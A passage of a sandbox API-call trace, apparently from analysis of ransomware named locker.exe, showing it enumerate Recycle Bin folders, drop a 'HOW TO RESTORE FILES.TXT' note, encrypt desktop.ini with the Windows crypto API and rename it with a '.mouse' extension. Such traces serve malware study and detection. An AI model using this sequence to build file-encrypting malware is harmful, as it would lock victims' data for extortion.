hHeap=0x3c0000) returned 1 [0198.247] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", fInfoLevelId=0x1, lpFindFileData=0x12af88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af88c) returned 0x432938 [0198.247] FindNextFileW (in: hFindFile=0x432938, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="..", cAlternateFileName="")) returned 1 [0198.247] FindNextFileW (in: hFindFile=0x432938, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0198.247] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbc0 [0198.247] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0198.247] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4354c8 [0198.247] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0198.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x12afcd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0198.248] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0198.248] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb48 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x42bb48, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", lpUsedDefaultChar=0x0) returned 36 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0198.248] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bc60 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x42bc60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", lpUsedDefaultChar=0x0) returned 36 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0198.248] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd78 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x42bd78, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", lpUsedDefaultChar=0x0) returned 36 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0198.248] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=36, lpMultiByteStr=0x42bb80, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", lpUsedDefaultChar=0x0) returned 36 [0198.248] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0198.248] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd78 | out: hHeap=0x3c0000) returned 1 [0198.248] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bc60 | out: hHeap=0x3c0000) returned 1 [0198.248] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb48 | out: hHeap=0x3c0000) returned 1 [0198.248] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.248] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd78 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ini", lpUsedDefaultChar=0x0) returned 4 [0198.249] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.249] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0198.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x43cd00, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 24 [0198.249] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.249] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0198.249] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.249] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0198.249] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436dc0 [0198.249] AreFileApisANSI () returned 1 [0198.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x436dc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0198.249] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x64) returned 0x41fa48 [0198.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x436dc0, cbMultiByte=-1, lpWideCharStr=0x41fa48, cchWideChar=50 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\HOW TO RESTORE FILES.TXT") returned 50 [0198.249] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$recycle.bin\\s-1-5-18\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x436dc0, ftLastAccessTime.dwLowDateTime=0x12afa94, ftLastAccessTime.dwHighDateTime=0x363223, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x41f208, nFileSizeHigh=0x70, nFileSizeLow=0x370bb4)) returned 0 [0198.249] GetLastError () returned 0x2 [0198.249] GetLastError () returned 0x2 [0198.249] SetLastError (dwErrCode=0x2) [0198.249] GetLastError () returned 0x2 [0198.249] SetLastError (dwErrCode=0x2) [0198.249] GetLastError () returned 0x2 [0198.249] SetLastError (dwErrCode=0x2) [0198.250] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41fa48 | out: hHeap=0x3c0000) returned 1 [0198.250] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436dc0 | out: hHeap=0x3c0000) returned 1 [0198.250] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d28 [0198.250] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d68 [0198.250] AreFileApisANSI () returned 1 [0198.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x436ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0198.250] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x64) returned 0x41f5e8 [0198.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x436ca0, cbMultiByte=-1, lpWideCharStr=0x41f5e8, cchWideChar=50 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\HOW TO RESTORE FILES.TXT") returned 50 [0198.250] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$recycle.bin\\s-1-5-18\\how to restore files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x12af930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0198.252] GetFileType (hFile=0x3bc) returned 0x1 [0198.252] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41f5e8 | out: hHeap=0x3c0000) returned 1 [0198.252] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x445608 [0198.253] GetLastError () returned 0x0 [0198.253] SetLastError (dwErrCode=0x0) [0198.254] WriteFile (in: hFile=0x3bc, lpBuffer=0x12ae5c0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x12ae5b8, lpOverlapped=0x0 | out: lpBuffer=0x12ae5c0*, lpNumberOfBytesWritten=0x12ae5b8*=0x71, lpOverlapped=0x0) returned 1 [0198.255] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x445608 | out: hHeap=0x3c0000) returned 1 [0198.255] CloseHandle (hObject=0x3bc) returned 1 [0198.255] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d68 | out: hHeap=0x3c0000) returned 1 [0198.255] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d28 | out: hHeap=0x3c0000) returned 1 [0198.255] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0198.256] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.256] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.256] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x81 [0198.256] CloseHandle (hObject=0x3bc) returned 1 [0198.256] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.256] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.256] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.256] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.256] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.256] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.256] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x3f24d8 [0198.256] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x3f24d8, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.256] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f24d8 | out: hHeap=0x3c0000) returned 1 [0198.256] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.256] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.257] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x81 [0198.257] CloseHandle (hObject=0x3bc) returned 1 [0198.257] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.257] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c98 [0198.257] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d28 [0198.257] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0198.258] GetFileType (hFile=0x3bc) returned 0x1 [0198.258] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa1) returned 0x3ee900 [0198.258] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa1) returned 0x3ef6c0 [0198.258] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x445608 [0198.258] ReadFile (in: hFile=0x3bc, lpBuffer=0x445608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x445608*, lpNumberOfBytesRead=0x12af714*=0x81, lpOverlapped=0x0) returned 1 [0198.260] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x81, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.261] GetVersion () returned 0x23f00206 [0198.261] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0198.266] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x432cb8) returned 1 [0198.266] CryptSetKeyParam (hKey=0x432cb8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0198.266] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa0) returned 0x41c4d8 [0198.266] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x41c4d8*, pdwDataLen=0x12af88c*=0x81, dwBufLen=0xa0 | out: pbData=0x41c4d8*, pdwDataLen=0x12af88c*=0x90) returned 1 [0198.266] CryptDestroyKey (hKey=0x432cb8) returned 1 [0198.267] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0198.267] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.267] GetLastError () returned 0x0 [0198.267] SetLastError (dwErrCode=0x0) [0198.267] GetLastError () returned 0x0 [0198.268] SetLastError (dwErrCode=0x0) [0198.268] GetLastError () returned 0x0 [0198.268] SetLastError (dwErrCode=0x0) [0198.268] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41c4d8 | out: hHeap=0x3c0000) returned 1 [0198.268] WriteFile (in: hFile=0x3bc, lpBuffer=0x445608*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x445608*, lpNumberOfBytesWritten=0x12af7c8*=0x90, lpOverlapped=0x0) returned 1 [0198.269] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x445608 | out: hHeap=0x3c0000) returned 1 [0198.269] CloseHandle (hObject=0x3bc) returned 1 [0198.276] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ee900 | out: hHeap=0x3c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ef6c0 | out: hHeap=0x3c0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4351b0 [0198.276] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.276] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x3f24d8 [0198.276] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x3f24d8, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.276] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f24d8 | out: hHeap=0x3c0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x76) returned 0x426228 [0198.276] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4351b0 | out: hHeap=0x3c0000) returned 1 [0198.276] MoveFileExW (lpExistingFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), lpNewFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.mouse" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.mouse"), dwFlags=0x2) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.277] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.mouse" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0198.277] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0198.277] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0198.278] CloseHandle (hObject=0x3bc) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x426228 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d28 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c98 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd78 | out: hHeap=0x3c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4354c8 | out: hHeap=0x3c0000) returned 1 [0198.278] FindNextFileW (in: hFindFile=0x432938, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12af8a8, ftCreationTime.dwLowDateTime=0x3251e4, ftCreationTime.dwHighDateTime=0x12af960, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x12afa30, ftLastWriteTime.dwLowDateTime=0x36d17a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x32ba97, dwReserved0=0x4354c8, dwReserved1=0x81, cFileName="", cAlternateFileName="茾3哈C齃Īᓮ2哈CP")) returned 0 [0198.278] GetLastError () returned 0x12 [0198.278] FindClose (in: hFindFile=0x432938 | out: hFindFile=0x432938) returned 1 [0198.278] FindNextFileW (in: hFindFile=0x432a38, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4354c8, dwReserved1=0x81, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="")) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.278] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40aa20 [0198.279] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0198.279] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd78 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=45, lpMultiByteStr=0x42bd78, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 45 [0198.279] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0198.279] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x436ca0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 61 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0198.279] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436dc0 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x436dc0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 61 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0198.279] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436af0 [0198.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, 